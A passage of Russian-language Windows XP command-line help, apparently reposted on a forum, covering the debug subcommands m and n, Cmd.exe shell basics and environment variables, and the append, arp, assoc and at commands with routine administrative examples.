<p>&#160; &#160; *<br />&#160; &#160; * Задание правильных записей диапазона</p> <p>&#160; &#160; &#160; Параметр диапазон используется в подкомандах debug для задания диапазона памяти. Параметр диапазон можно задать в одном из следующих форматов: начальный адрес и конечный адрес или начальный адрес и длина (обозначаемая l) диапазона. Например, оба следующих выражения задают диапазон из 16 байтов, начинающийся с адреса CS:100:</p> <p>&#160; &#160; &#160; cs:100 10f</p> <p>&#160; &#160; &#160; cs:100 l 10<br />&#160; &#160; * Задание правильных записей адреса</p> <p>&#160; &#160; &#160; Адрес состоит из двух частей: первая содержит буквенное обозначение сегментного регистра или адрес сегмента из четырех цифр, а вторая содержит значение смещения. Адрес сегмента или сегментный регистр могут быть пропущены. По умолчанию для подкоманд a, g, l, t, u и w команды debug адрес сегмента содержится в регистре CS. Для других подкоманд по умолчанию используется сегмент DS. Все числовые значения при этом представлены в шестнадцатеричном формате. Между именем сегмента и значением смещения следует вставлять двоеточие. Следующие адреса являются допустимыми:</p> <p>&#160; &#160; &#160; CS:0100</p> <p>&#160; &#160; &#160; 04BA:0100<br />&#160; &#160; * Копирование данных</p> <p>&#160; &#160; &#160; Если адреса в копируемом блоке памяти заданы так, что в этот блок не записываются новые данные, то информация в этом блоке не изменяется. Если же операция копирования является перекрывающей, перекрывающиеся данные перезаписываются. (Операция копирования является перекрывающей, если два блока памяти имеют общую часть).<br />&#160; &#160; * Перекрывающееся копирование двух областей памяти</p> <p>&#160; &#160; &#160; Подкоманда m выполняет перекрывающее копирование без потери данных в области назначения. Содержимое адресов, которые будут перезаписаны, копируется в первую очередь. Если данные копируются из старших адресов в младшие адреса, операция копирования начинается с младшего адреса исходного блока и продолжается в направлении старшего адреса. И наоборот, если данные копируются из младших адресов в старшие, копирование начинается со старших адресов исходного блока и продолжается в направлении младшего адреса.</p> <p>Примеры</p> <p>Чтобы скопировать содержимое адресов с CS:110 по CS:510, а затем с CS:10F по CS:50F и так далее, пока все содержимое адресов с CS:100 по CS:500 не будет скопировано, введите следующую команду:</p> <p>mcs:100 110 cs:500</p> <p>Чтобы просмотреть результаты, воспользуйтесь подкомандой d (dump), указав адреса, заданные в подкоманде m.</p> <p>========================================================================================<br />Debug: n (name)</p> <p>Задание имени исполняемого файла для команд debug l (load) или w (write) или задание параметров для отлаживаемого исполняемого файла. Выполненная без параметров подкоманда n очищает текущие значения.<br />Синтаксис</p> <p>n [путь][исполняемый_файл]</p> <p>n [параметры_файла]<br />Параметры</p> <p>[путь][исполняемый_файл<br />&#160; &#160; Задание расположения и имени исполняемого файла для тестирования.<br />[параметры_файла]<br />&#160; &#160; Задание параметров и ключей командной строки для тестируемого исполняемого файла.<br />?<br />&#160; &#160; Вывод списка подкоманд debug.</p> <p>Примечания</p> <p>&#160; &#160; *<br />&#160; &#160; * Использование подкоманды n</p> <p>&#160; &#160; &#160; Подкоманду n можно использовать двумя способами. Во-первых, для задания имени файла для последующих подкоманд l (load) или w (write). Если программа Debug.exe вызвана без задания имени файла для отладки, команда n имя_файла должна быть вызвана перед использованием команды l для загрузки файла. Имя файла форматируется соответствующим образом для контрольного блока файла (FCB) по адресу CS:5C. Во-вторых, подкоманда n может использоваться для задания параметров и ключей командной строки отлаживаемого файла.<br />&#160; &#160; * Области памяти</p> <p>&#160; &#160; &#160; В следующей таблице перечислены четыре области памяти, которые используются командой n.<br />&#160; &#160; &#160; Область памяти Contents<br />&#160; &#160; &#160; CS:5C Блок управления файлом (FCB) для файла 1<br />&#160; &#160; &#160; CS:6C Блок управления файлом (FCB) для файла 2<br />&#160; &#160; &#160; CS:80 Длина строки команды n (в символах)<br />&#160; &#160; &#160; CS:81 Начало строки команды n</p> <p>&#160; &#160; &#160; Первое имя файла, задаваемое командой n, размещается в блоке управления файлом по адресу CS:5C. Если задано второе имя, оно помещается в блок управления файлом по адресу CS:6C. Количество символов в командной строке команды n (кроме первого символа, n) сохраняется по адресу CS:80. Собственно командная строка n (снова без символа n) сохраняется, начиная с адреса CS:81. Эти символы могут быть любыми параметрами и разделителями, которые допустимо вводить с командной строки в Windows 2000.<br />&#160; &#160; * Сведения о загрузке содержимого файла или определенных секторов диска в память с помощью команды Debug L (Load) см. по ссылке «».<br />&#160; &#160; * Сведения о записи отлаживаемого файла на диск с помощью подкоманды w (write) см. по ссылке «».</p> <p>Примеры</p> <p>В этом примере запускается команда debug и загружается программа Prog.com для отладки. Чтобы указать два параметра для программы Prog.com и запустить эту программу, введите следующую команду:</p> <p>debug prog.com<br />nparam1 param2<br />g</p> <p>В этом случае подкоманда g (go) запускает программу так, как если бы она была запущена с командной строки в виде:</p> <p>prog param1 param2</p> <p>При тестировании и отладке создается среда времени исполнения для программы Prog.com.</p> <p>В следующей последовательности команд первая подкоманда n задает имя файла File1.exe для последующей подкоманды l (load), которая загружает файл File1.exe в память. Вторая подкоманда n задает параметры для файла File1.exe. Наконец, подкоманда g запускает File1.exe так, как если бы с командной строки было бы введено File1 File2.dat File2.dat.</p> <p>nfile1.exe<br />l<br />nfile2.dat file3.dat<br />g</p> <p>После команды l во втором экземпляре команда n не используется. Если подкоманда w (write) используется во втором экземпляре подкоманды n, файл File1.exe (т. е. отлаживаемый) сохраняется под именем File2.dat. Чтобы этого не произошло, всегда вызывайте команду l или w сразу же после команды n в первой форме.</p> mybb@mybb.ru (admin) Fri, 13 Mar 2009 15:24:19 +0300 http://xhackx.bbon.ru/viewtopic.php?pid=21#p21 http://xhackx.bbon.ru/viewtopic.php?pid=20#p20 <p>Общие сведения о командной оболочке</p> <p>Командная оболочка — это отдельный программный продукт, который обеспечивает прямую связь между пользователем и операционной системой. Текстовый пользовательский интерфейс командной строки предоставляет среду, в которой выполняются приложения и служебные программы с текстовым интерфейсом. В командной оболочке программы выполняются и результат выполнения отображается на экране в виде, сходном с интерпретатором Command.com MS-DOS. Командная оболочка Windows XP использует интерпретатор команд Cmd.exe, который загружает приложения и направляет поток данных между приложениями, для перевода введенной команды в понятный системе вид.</p> <p>Имеется возможность использовать командную оболочку для создания и редактирования пакетных файлов (также называемых сценариями), что позволит автоматизировать выполнение обычных задач. Например, можно использовать сценарии для автоматизации управления учетными записями пользователей и ежедневной архивацией в нерабочие часы. Также можно использовать сервер сценариев Windows, CScript.exe, для выполнения в командной оболочке сложных сценариев. Выполнение операций с помощью пакетных файлов является более эффективным, чем с помощью интерфейса пользователя. Пакетные файлы принимают все команды, доступные из командной строки. Дополнительные сведения о пакетных файлах и создании сценариев см. в разделе Использование пакетных файлов.</p> <p>Имеется возможность настроить окно командной строки для облегчения просмотра и для увеличения контроля за выполнением программ. Дополнительные сведения о настройке окна командной строки см. в разделе Настройка командной строки.<br />Использование синтаксиса команд</p> <p>Синтаксическая структура выводится в том порядке, в котором следует вводить команду и следующие за ней параметры, если они есть. Следующий пример команды xcopy иллюстрирует разнообразие синтаксических форматов текста.</p> <p>xcopy источник [результат] [/w] [/p] [/c] [/v] [/q] [/f] [/l] [/g] [/d[:мм-дд-гггг]] [/u] [/i] [/s [/e]] [/t] [/k] [/r] [/h] [{/a|/m}] [/n] [/o] [/x] [/exclude:файл1[+[файл2]][+[файл3]] [{/y|/-y}] [/z]</p> <p>В следующей таблице показано, как следует интерпретировать различные текстовые форматы.<br />Использование нескольких команд и символов условной обработки</p> <p>Можно выполнять несколько команд из одной командной строки или сценария с помощью сиволов условной обработки. При использовании нескольких команд, содержащих символы условной обработки, выполнение команд, стоящих справа от символа условной обработки, будет проводиться в зависимости от результатов выполнения команды, стоящей слева от символа. Например, требуется, чтобы команда выполнялась, только если предыдущая команда не была выполнена успешно. Или требуется, чтобы команда выполнялась, только если предыдущая команда была выполнена успешно.</p> <p>Для передачи нескольких команд можно использовать специальные символы, перечисленные в следующей таблице.<br />Символ Синтаксис Определение<br />&amp; [...] команда1 &amp; команда2 Используется для разделения нескольких команд в одной командной строке. В Cmd.exe выполняется первая команда, затем вторая команда.<br />&amp;&amp; [...] команда1 &amp;&amp; команда2 Запускает команду, стоящую за символом &amp;&amp;, только если команда, стоящая перед этим символом была выполнена успешно. В Cmd.exe выполняется первая команда. Вторая команда выполняется, только если первая была выполнена успешно.<br />|| [...] команда1 || команда2 Запускает команду, стоящую за символом ||, только если команда, стоящая перед символом || не была выполнена. В Cmd.exe выполняется первая команда. Вторая команда выполняется, только если первая не была выполнена (полученный код ошибки превышает ноль).<br />( ) [...] (команда1 &amp; команда2) Используется для группировки или вложения команд.<br />; или , команда1 параметр1;параметр2 Используется для разделения параметров команды.</p> <p>Примечания</p> <p>&#160; &#160; * Амперсанд (&amp;), вертикальная черта (|) и скобки ( ) являются специальными символами, которым должен предшествовать управляющий символ (^) или кавычки, если эти символы передаются в качестве аргументов.<br />&#160; &#160; * Если команда завершает операцию успешно, возвращается нулевой (0) код ошибки или не возвращается никакого кода. Дополнительные сведения о кодах завершения см. в разделе Пакеты Microsoft Windows Resource Kits.</p> <p>Вложенные командные оболочки</p> <p>Имеется возможность вкладывать командные оболочки в Cmd.exe, открывая новый экземпляр Cmd.exe из командной строки. По умолчанию каждый экземпляр Cmd.exe наследует среду своего родительского приложения Cmd.exe. Вложение экземпляров Cmd.exe позволяет вносить в локальную среду изменения, которые не повлияют на родительское приложение Cmd.exe. Это позволяет сохранять исходную среду Cmd.exe и возвращаться к ней после удаления вложенной командной оболочки. Изменения вложенной командной оболочки не сохраняются.</p> <p>Чтобы создать вложенную командную оболочку, в командной строке введите:</p> <p>cmd</p> <p>Появится сообщение следующего вида:<br />Microsoft (R) Windows XP (TM)<br />(C) Copyright 1985-2001 Microsoft Corp.</p> <p>Чтобы закрыть все вложенные командные оболочки, введите команду exit.</p> <p>Можно еще уже локализовать изменения в экземпляре Cmd.exe (или в сценарии) с помощью команд setlocal и endlocal. Команда setlocal создает локальную область, а endlocal ее удаляет. Любые изменения, сделанные внутри области, созданной командами setlocal и endlocal, не учитываются; таким образом исходная среда остается без изменений. С помощью этих команд можно создать до 32 вложенных областей. Дополнительные сведения о командах setlocal и endlocal см. в разделах Setlocal и Endlocal.<br />Использование переменных среды в Cmd.exe</p> <p>Среда командной оболочки Cmd.exe определяется переменными, задающими поведение командной оболочки и операционной системы. Имеется возможность определить поведение среды командной оболочки или среды всей операционной системы с помощью двух типов переменных среды: системных и локальных. Системные переменные среды определяют поведение глобальной среды операционной системы. Локальные переменные среды определяют поведение среды в данном экземпляре Cmd.exe.</p> <p>Системные переменные среды заданы заранее в операционной системе и доступны для всех процессов Windows XP. Только пользователи с привилегиями администратора могут изменять эти переменные. Эти переменные наиболее часто используются в сценариях входа в систему.</p> <p>Локальные переменные среды доступны, только когда пользователь, для которого они были созданы, вошел в систему. Локальные переменные из куста HKEY_CURRENT_USER подходят только для текущего пользователя, но определяют поведение глобальной среды операционной системы.</p> <p>В следующем списке представлены различные типы переменных в порядке убывания приоритета.</p> <p>&#160; &#160;1. Встроенные системные переменные<br />&#160; &#160;2. Системные переменные куста HKEY_LOCAL_MACHINE<br />&#160; &#160;3. Локальные переменные куста HKEY_CURRENT_USER<br />&#160; &#160;4. Все переменные среды и пути указаны в файле Autoexec.bat.<br />&#160; &#160;5. Все переменные среды и пути указаны в сценарии входа в систему (если он имеется).<br />&#160; &#160;6. Переменные, используемые интерактивно в сценарии или пакетном файле</p> <p>В командной оболочке каждый экземпляр Cmd.exe наследует среду своего родительского приложения. Поэтому можно изменять переменные в новой среде Cmd.exe, что не повлияет на среду родительского приложения.</p> <p>В следующей таблице приведен список системных и локальных переменных среды для Windows XP.<br />Переменная Тип Описание<br />%ALLUSERSPROFILE% Локальная Возвращает размещение профиля «All Users».<br />%APPDATA% Локальная Возвращает используемое по умолчанию размещение данных приложений.<br />%CD% Локальная Возвращает путь к текущей папке.<br />%CMDCMDLINE% Локальная Возвращает строку команд, с помощью которой был запущен данный экземпляр Cmd.exe.<br />%CMDEXTVERSION% Системная Возвращает номер версии текущих расширений обработчика команд.<br />%COMPUTERNAME% Системная Возвращает имя компьютера.<br />%COMSPEC% Системная Возвращает путь к исполняемой командной оболочке.<br />%DATE% Системная Возвращает текущие данные. Использует тот же формат, что и команда date /t. Создается командой Cmd.exe. Дополнительные сведения о команде date см. в разделе Date.<br />%ERRORLEVEL% Системная Возвращает код ошибки последней использовавшейся команды. Значение, не равное нуля, обычно указывает на наличие ошибки.<br />%HOMEDRIVE% Системная Возвращает имя диска локальной рабочей станции, связанного с основным каталогом пользователя. Задается на основании расположения основного каталога. Основной каталог пользователя указывается в оснастке «Локальные пользователи и группы».<br />%HOMEPATH% Системная Возвращает полный путь к основному каталогу пользователя. Задается на основании расположения основного каталога. Основной каталог пользователя указывается в оснастке «Локальные пользователи и группы».<br />%HOMESHARE% Системная Возвращает сетевой путь к общему основному каталогу пользователя. Задается на основании расположения основного каталога. Основной каталог пользователя указывается в оснастке «Локальные пользователи и группы».<br />%LOGONSEVER% Локальная Возвращает имя контроллера домена, который проверял подлинность текущей сессии.<br />%NUMBER_OF_PROCESSORS% Системная Задает количество процессоров, установленных на компьютере.<br />%OS% Системная Возвращает имя операционной системы. При использовании Windows 2000 имя операционной системы отображается как Windows_NT.<br />%PATH% Системная Указывает путь поиска для исполняемых файлов.<br />%PATHEXT% Системная Возвращает список расширений файлов, которые рассматриваются операционной системой как исполняемые.<br />%PROCESSOR_ARCHITECTURE% Системная Возвращает архитектуру процессора. Значения: x86, IA64.<br />%PROCESSOR_IDENTFIER% Системная Возвращает описание процессора.<br />%PROCESSOR_LEVEL% Системная Возвращает номер модели процессора, установленного на компьютере.<br />%PROCESSOR_REVISION% Системная Возвращает номер модификации процессора.<br />%PROMPT% Локальная Возвращает параметры командной строки для текущего интерпретатора. Создается командой Cmd.exe.<br />%RANDOM% Системная Возвращает произвольное десятичное число от 0 до 32767. Создается командой Cmd.exe.<br />%SYSTEMDRIVE% Системная Возвращает имя диска, содержащего корневой каталог Windows XP (т. е. системный каталог).<br />%SYSTEMROOT% Системная Возвращает размещение системного каталога Windows XP.<br />%TEMP% и %TMP% Системная и пользовательская Возвращает временные папки, по умолчанию используемые приложениями, которые доступны пользователям, выполнившим вход в систему. Некоторые приложения требуют переменную TEMP, другие — переменную TMP.<br />%TIME% Системная Возвращает текущее время. Использует тот же формат, что и команда time /t. Создается командой Cmd.exe. Дополнительные сведения о команде time см. в разделе Time.<br />%USERDOMAIN% Локальная Возвращает имя домена, содержащего список учетных записей пользователей.<br />%USERNAME% Локальная Возвращает имя пользователя, выполнившего вход в систему.<br />%USERPROFILE% Локальная Возвращает размещение профиля для текущего пользователя.<br />%WINDIR% Системная Возвращает размещение каталога операционной системы.<br />Установка переменных среды</p> <p>Используйте команду set для создания, удаления или отображения переменных среды. Команда set изменяет переменные только в среде текущей оболочки.</p> <p>Чтобы отобразить переменную, в командной строке введите:</p> <p>set имя_переменной</p> <p>Чтобы добавить переменную, в командной строке введите:</p> <p>set variablename=значение</p> <p>Чтобы удалить переменную, в командной строке введите:</p> <p>set имя_переменной=</p> <p>Имеется возможность использовать большинство символов в качестве значений переменных, в том числе пробел. При использовании специальных символов, таких как &lt;, &gt;, &amp;, или ^, перед ними следует помещать управляющий символ (^) или кавычки. При использовании кавычек они включаются в значение переменной, так как все символы, следующие после знака равенства принимаются за значение переменной. Учтите следующие примеры.</p> <p>&#160; &#160; * Чтобы создать значение переменной new&amp;name ,введите:</p> <p>&#160; &#160; &#160; set varname=new^&amp;name<br />&#160; &#160; * Чтобы создать значение переменной &quot;new&amp;name&quot; ,введите:</p> <p>&#160; &#160; &#160; set varname=&quot;new&amp;name&quot;<br />&#160; &#160; * При вводе в командной строке set varname=new&amp;name появляется следующее сообщение об ошибке:</p> <p>&#160; &#160; &#160; &quot;'name' is not recognized as an internal or external command, operable program or batch file.&quot;</p> <p>В именах переменных регистр символов не учитывается. Однако, команда set отображает значение переменной так, как оно было введено. Можно комбинировать символы нижнего и верхнего регистра в именах переменных, чтобы облегчить восприятие кода (например, ИмяПользователя).</p> <p>Примечания</p> <p>&#160; &#160; * Максимальный размер отдельной переменной среды составляет 8192 байта.<br />&#160; &#160; * Максимальный общий размер всех переменных среды, включая имена переменных и знак равенства, составляет 65 536 Кбайт.</p> <p>Подстановка значений в переменные среды</p> <p>Чтобы иметь возможность подставлять значения в переменную среды из командной строки или из сценариев, следует заключить имя соответствующей переменной в символы процентов (%имя_переменной%). Символы процентов указывают на то, что Cmd.exe должен обратиться к значениям переменных, а не делать посимвольное сравнение. После определения значения для имени переменной, заключите имя переменной в символы процентов. Cmd.exe проводит поиск всех вхождений имени переменной и заменяет его на определенное значение переменной. Например, требуется создать сценарий, содержащий различные значения (например, имена пользователей), и требуется определить соответствующее значение переменной среды USERNAME для каждого пользователя. Для этого следует написать сценарий с использованием переменной USERNAME, заключенной в кавычки. При выполнении сценария Cmd.exe заменит вхождения %USERNAME% соответствующими значениями, что избавит от необходимости делать это вручную для каждого пользователя. Подстановка значений не является рекурсивной. Cmd.exe проверяет переменные один раз. Дополнительные сведения о подстановке значений в переменные см. в разделах For и Call.<br />========================================================================================<br />Append</p> <p>Разрешение программе открывать файлы данных в указанных папках, как будто они находятся в текущей папке. Вызванная без параметров, команда append выводит список присоединенных каталогов.<br />Синтаксис</p> <p>append [;] [[диск:]путь[;...]] [/x:{on|off}][/path:{on|off}] [/e]<br />Параметры</p> <p>;<br />&#160; &#160; Очищает список папок, заданных в предыдущих вызовах команды append.<br />[диск:]путь<br />&#160; &#160; Задает диск и папку, которую требуется присоединить к текущей папке. Если диск не указан, по умолчанию используется текущий диск. Имеется возможность задать несколько комбинаций [диск:]путь, разделенных точкой с запятой.<br />/x:{on | off}<br />&#160; &#160; Определяет, будет ли подсистема MS-DOS искать присоединенные папки при выполнении программ. /x:on — поиск присоединенных папок выполняется. /x:off — поиск присоединенных папок не выполняется. <br />/path:{on|off}<br />&#160; &#160; Указывает программе на необходимость поиска файлов в присоединенных папках, если имена файлов указаны полностью. По умолчанию используется значение /path:on.<br />/e<br />&#160; &#160; Запись списка присоединенных папок в переменную среды APPEND. Этот параметр командной строки можно использовать только при первом вызове команды append после запуска системы.<br />/?<br />&#160; &#160; Отображение справки в командной строке.</p> <p>Заметки</p> <p>&#160; &#160; *<br />&#160; &#160; * Сохранение списка присоединенных папок</p> <p>&#160; &#160; &#160; Параметр командной строки /e команды append позволяет присвоить список присоединенных папок переменной среды с именем APPEND. Для этого сначала используйте команду append только с параметром командной строки /e. Затем повторно воспользуйтесь командой append, указав папки, которые требуется присоединить. Параметры /e и [диск:]путь не могут использоваться в одной командной строке.<br />&#160; &#160; * Задание нескольких присоединенных папок</p> <p>&#160; &#160; &#160; Чтобы присоединить несколько папок, вводите их, разделяя точками с запятой. При повторном вызове команды append с параметрами [диск:]путь существующий список присоединенных папок в команде append будет заменен новым.<br />&#160; &#160; * Использование параметра dir</p> <p>&#160; &#160; &#160; При использовании команды dir для вывода списка фалов и подкаталогов каталога имена файлов из присоединенных папок не отображаются.<br />&#160; &#160; * Разрешение конфликтов имен файлов</p> <p>&#160; &#160; &#160; Если в имена файлов в текущей и присоединенной папке совпадают, для работы программ открываются файлы текущей папки.<br />&#160; &#160; * Команда append и создание новых файлов</p> <p>&#160; &#160; &#160; Если открыт файл в присоединенной папке, то работа с ним ведется так же, как и с файлами текущей папки. Если выполняется сохранение файла путем создания файла с таким же именем, новый файл сохраняется в текущей папке, а не в присоединенной. Команда append используется при работе с файлами данных, которые не изменяются или изменяются без создания новых копий. Например, при работе с базами данных новые копии файлов, как правило, не создаются. Текстовые редакторы и процессоры обычно сохраняют файлы путем создания новых копий. Чтобы избежать некорректной работы, не используйте команду append с такими программами.<br />&#160; &#160; * Использование параметра /x:on с командой path</p> <p>&#160; &#160; &#160; Если задан параметр /x:on, программы, находящиеся в присоединенных папках, могут быть запущены просто вводом имени программы в командной строке. Обычно команда path позволяет указать папки, содержащие программы, однако для указания присоединенных папок, содержащих программы, не требуется использовать команду path. Подсистема MS-DOS найдет эту программу с использованием списка присоединенных каталогов. Это вызвано тем, что MS-DOS вначале ищет исполняемый файл программы в текущем каталоге, а затем в каталогах, задаваемых командой .<br />&#160; &#160; * Сокращение параметра /x:on до /x</p> <p>&#160; &#160; &#160; Имеется возможность сократить параметр /x:on до /x. Для этого введите параметр /x:on при первом вызове команды append после запуска системы. После этого можно переключаться между /x:on и /x:off.<br />&#160; &#160; * Использование параметра /e с командой set</p> <p>&#160; &#160; &#160; Воспользовавшись параметром /e с командой set, можно вывести список присоединенных папок. Для получения дополнительных сведений о переменных среды и команде set щелкните ссылку «».</p> <p>Примеры</p> <p>Чтобы получить возможность открывать в программах файлы данных из папок B:\Letters и A:\Reports как из текущей папки, введите:</p> <p>append b:\letters;a:\reports</p> <p>Чтобы присоединить те же самые папки и сохранить копию списка присоединенных файлов в среде Windows XP (эту операцию нужно выполнять при первом вызове команды append после запуска системы), введите:</p> <p>append /e</p> <p>append b:\letters;a:\reports</p> <p>========================================================================================<br />Arp</p> <p>Служит для вывода и изменения записей кэша протокола ARP, который содержит одну или несколько таблиц, использующихся для хранения IP-адресов и соответствующих им физических адресов Ethernet или Token Ring. Для каждого сетевого адаптера Ethernet или Token Ring, установленного в компьютере, используется отдельная таблица. Запущенная без параметров, команда arp выводит справку.<br />Синтаксис</p> <p>arp [-a [инет_адрес] [-N иф_адрес]] [-g [инет_адрес] [-N иф_адрес]] [-d инет_адрес [иф_адрес]] [- инет_адрес е_адрес [иф_адрес]]<br />Параметры</p> <p>-a [инет_адрес] [-N иф_адрес]<br />&#160; &#160; Вывод таблиц текущего протокола ARP для всех интерфейсов. Чтобы вывести записи ARP для определенного IP-адреса, воспользуйтесь командой arp -a с параметром инет_адрес, где инет_адрес — это IP-адрес. Чтобы вывести таблицы кэша ARP для определенного интерфейса, укажите параметр -N иф_адрес, где иф_адрес — это IP-адрес, назначенный интерфейсу. Параметр -N вводится с учетом регистра.<br />-g [инет_адрес] [-N иф_адрес]<br />&#160; &#160; Совпадает с -a.<br />-d инет_адрес [иф_адрес]<br />&#160; &#160; Удаление записи с определенным IP-адресом, где инет_адрес — это IP-адрес. Чтобы запись таблицы для определенного интерфейса, укажите параметр иф_адрес, где иф_адрес — это IP-адрес, назначенный интерфейсу. Чтобы удалить все записи, введите звездочку (*) вместо параметра инет_адрес.<br />-s инет_адрес е_адрес [иф_адрес]<br />&#160; &#160; Добавление статической записи, которая сопоставляет IP-адрес инет_адрес с физическим адресом е_адрес, в кэш ARP. Чтобы добавить статическую запись кэша ARP в таблицу для определенного интерфейса, укажите параметр иф_адрес, где иф_адрес — это IP-адрес, назначенный интерфейсу.<br />/?<br />&#160; &#160; Отображение справки в командной строке.</p> <p>Заметки</p> <p>&#160; &#160; * IP-адреса для параметров инет_адрес и иф_адрес записываются в точечно-десятичной нотации.<br />&#160; &#160; * Физический адрес для параметра е_адрес состоит из шести байт, записанных в шестнадцатеричном формате и разделенных дефисами (например 00-AA-00-4F-2A-9C).<br />&#160; &#160; * Записи, добавленные с параметром -s, являются статическими и не удаляются из кэша ARP после истечения периода времени. Записи удаляются, если остановлен и запущен протокол TCP/IP. Чтобы создать постоянные статические записи кэша ARP, введите соответствующие команды arp и воспользуйтесь планировщиком заданий для выполнения этого файла при запуске.<br />&#160; &#160; * Эта команда доступна, только если в свойствах сетевого адаптера в объекте Сетевые подключения в качестве компонента установлен протокол Интернета (TCP/IP).</p> <p>Примеры</p> <p>Чтобы вывести таблицы кэша ARP для всех интерфейсов, введите:</p> <p>arp -a</p> <p>Чтобы вывести таблицу кэша ARP для интерфейса, которому назначен IP-адрес 10.0.0.99, введите:</p> <p>arp -a -N 10.0.0.99</p> <p>Чтобы добавить статическую запись кэша ARP, которая сопоставляет IP-адрес 10.0.0.80 с физическим адресом 00-AA-00-4F-2A-9C, введите:</p> <p>arp - 10.0.0.80 00-AA-00-4F-2A-9C</p> <p>========================================================================================<br />Assoc</p> <p>Вывод или изменение связи между расширениями имени и типами файлов. Запущенная без параметров команда assoc выводит список текущих связей между расширениями имени и типами файлов.<br />Синтаксис</p> <p>assoc [.рсш[=[тип_файла]]]<br />Параметры</p> <p>.рсш<br />&#160; &#160; Задание расширения имени файла.<br />тип_файла<br />&#160; &#160; Задание типа файла, с которым сопоставляется указанное расширение имени файла.<br />/?<br />&#160; &#160; Отображение справки в командной строке.</p> <p>Заметки</p> <p>&#160; &#160; * Чтобы удалить связь между расширением имени и типом файла, введите пробел после знака равенства.<br />&#160; &#160; * Чтобы просмотреть текущие типы файлов, выполните команду ftype без параметров.<br />&#160; &#160; * Чтобы направить вывод команды assoc в текстовый файл, воспользуйтесь оператором перенаправления &gt;.</p> <p>Примеры</p> <p>Чтобы вывести текущий тип файла, соответствующий расширению имени файла .txt, введите:</p> <p>assoc .txt</p> <p>Чтобы удалить тип файла, соответствующий расширению имени файла .txt, введите:</p> <p>assoc .txt=</p> <p>Чтобы просмотреть текущие сопоставления типов файлов, введите:</p> <p>assoc | more</p> <p>Чтобы отправить результаты выполнения команды assoc в файл Assoc.cfg, введите:</p> <p>assoc&gt;assoc.cfg</p> <p>========================================================================================<br />At</p> <p>Запуск программ и команд в заданное время. Команду at можно использовать только при запущенной службе расписаний. Вызванная без параметров команда at выводит список всех команд и программ, которые будут запущены с ее помощью.<br />Синтаксис</p> <p>at [\\имя_компьютера] [{[код] [/delete]|/delete [/yes]}]</p> <p>at [[\\имя_компьютера] часы:минуты [/interactive] [{/every:дата[,...]|/next:дата[,...]}] команда]<br />Параметры</p> <p>\\имя_компьютера<br />&#160; &#160; Задание удаленного компьютера, на котором могут быть запущены команды и программы. Если этот параметр не задан, предполагается, что они будут запущены на том компьютере, где выполняется команда at.<br />код<br />&#160; &#160; Указание идентификационного номера, присваиваемого команде или программе, которая будет запущена.<br />/delete<br />&#160; &#160; Отмена выполнения команды. Если идентификатор Код не задан, все запланированные команды на компьютере будут отменены.<br />/yes<br />&#160; &#160; Задание утвердительного ответа на все запросы системы при отмене запланированных событий.<br />часы:минуты<br />&#160; &#160; Задание времени запуска команды. Время задается в 24-х часовом формате часы:минуты (от 00:00 [полночь] до 23:59).<br />/interactive<br />&#160; &#160; Обмен данными с помощью команды с теми пользователями, которые работают в системе в момент выполнения запланированной команды.<br />/every:<br />&#160; &#160; Выполнение команды в указанный день или дни в течение недели или месяца (например каждый четверг или каждый третий день месяца).<br />дата<br />&#160; &#160; Задание даты выполнения команды. Имеется возможность указать один или несколько дней недели (т. е. ввести M,T,W,Th,F,S,Su) либо один или несколько дней месяца (т. е. ввести числа в диапазоне от 1 до 31). Несколько дат разделяются запятыми. Если параметр дата не задан, в команде at используется текущий день месяца.<br />/next:<br />&#160; &#160; Выполнение команды при наступлении следующей заданной даты (например в следующий четверг). <br />команда<br />&#160; &#160; Задание команды Windows, программы (т. е. файл .exe или .com) или пакетного файла (т. е. файл .bat или .cmd), которые требуется выполнить. Если для задания команды необходимо указывать ее местоположение, имя файла задается полностью, с указанием пути и диска. Если команда запускается на удаленном компьютере, укажите имя сервера и сетевое имя в стандартном формате записи пути (UNC), а не имя диска этого компьютера.<br />/?<br />&#160; &#160; Отображение справки в командной строке.</p> <p>Заметки</p> <p>&#160; &#160; *</p> <p>&#160; &#160; &#160; Команда Schtasks является более мощным, расширенным средством планирования заданий с помощью командной строки и включает в себя все функциональные возможности команды at. Для планирования заданий с командной строки используйте команду schtasks вместо at. Для получения дополнительных сведений о команде schtasks щелкните ссылку &quot;&quot;.<br />&#160; &#160; * Использование at</p> <p>&#160; &#160; &#160; Для вызова команды at пользователь должен быть членом локальной группы администраторов.<br />&#160; &#160; * Загрузка программы Cmd.exe</p> <p>&#160; &#160; &#160; Команда at не вызывает автоматически командный процессор Cmd.exe перед запуском команды. Если запускается не исполняемый (.exe) файл, перед командой должен быть явно загружен командный процессор Cmd.exe, например:</p> <p>&#160; &#160; &#160; cmd /c dir &gt; c:\test.out<br />&#160; &#160; * Просмотр запланированных команд</p> <p>&#160; &#160; &#160; Если команда at используется без параметров, запланированные задания выводятся в таблице следующего вида:<br />&#160; &#160; &#160; Состояние&#160; Код&#160; &#160;День&#160; &#160; &#160; &#160;Время&#160; &#160; &#160; &#160; Командная строка<br />&#160; &#160; &#160; OK&#160; &#160; &#160; 1&#160; &#160; Каждый F&#160; &#160; 4:30 PM&#160; &#160; &#160;net send group leads status due<br />&#160; &#160; &#160; OK&#160; &#160; &#160; 2&#160; &#160; Каждый M&#160; &#160; 12:00 AM&#160; &#160; chkstor &gt; check.file<br />&#160; &#160; &#160; OK&#160; &#160; &#160; 3&#160; &#160; Каждый F&#160; &#160; 11:59 PM&#160; &#160; backup2.bat<br />&#160; &#160; * Включение идентификационного номера (код)</p> <p>&#160; &#160; &#160; Если в командной строке для команды at указан идентификационный номер (код), выводятся сведения об одной записи, имеющие следующий вид:</p> <p>&#160; &#160; &#160; Код задачи:&#160; &#160; &#160; 1</p> <p>&#160; &#160; &#160; Состояние:&#160; &#160; &#160; &#160;OK</p> <p>&#160; &#160; &#160; Дата:&#160; &#160; &#160;Каждый&#160; F</p> <p>&#160; &#160; &#160; Время дня:&#160; 4:30 PM</p> <p>&#160; &#160; &#160; Команда:&#160; &#160; &#160; net send group leads status due</p> <p>&#160; &#160; &#160; После того как запуск команды запланирован с помощью at, особенно если запускаемая команда имеет дополнительные параметры, проверьте правильность ее ввода, вызвав at без параметров. Если сведения в столбце «Командная строка» содержат ошибки, удалите запись о данной команде в списке запланированных команд и повторно введите данные. Если по-прежнему имеют место ошибки, введите команду с меньшим числом параметров.<br />&#160; &#160; * Просмотр результатов</p> <p>&#160; &#160; &#160; Команды, запуск которых задан с помощью at, выполняются как фоновые процессы. Сведения не отображаются на экране компьютера. Для перенаправления вывода в файл используется символ перенаправления (&gt;). Если вывод перенаправляется в файл, необходимо использовать управляющий символ 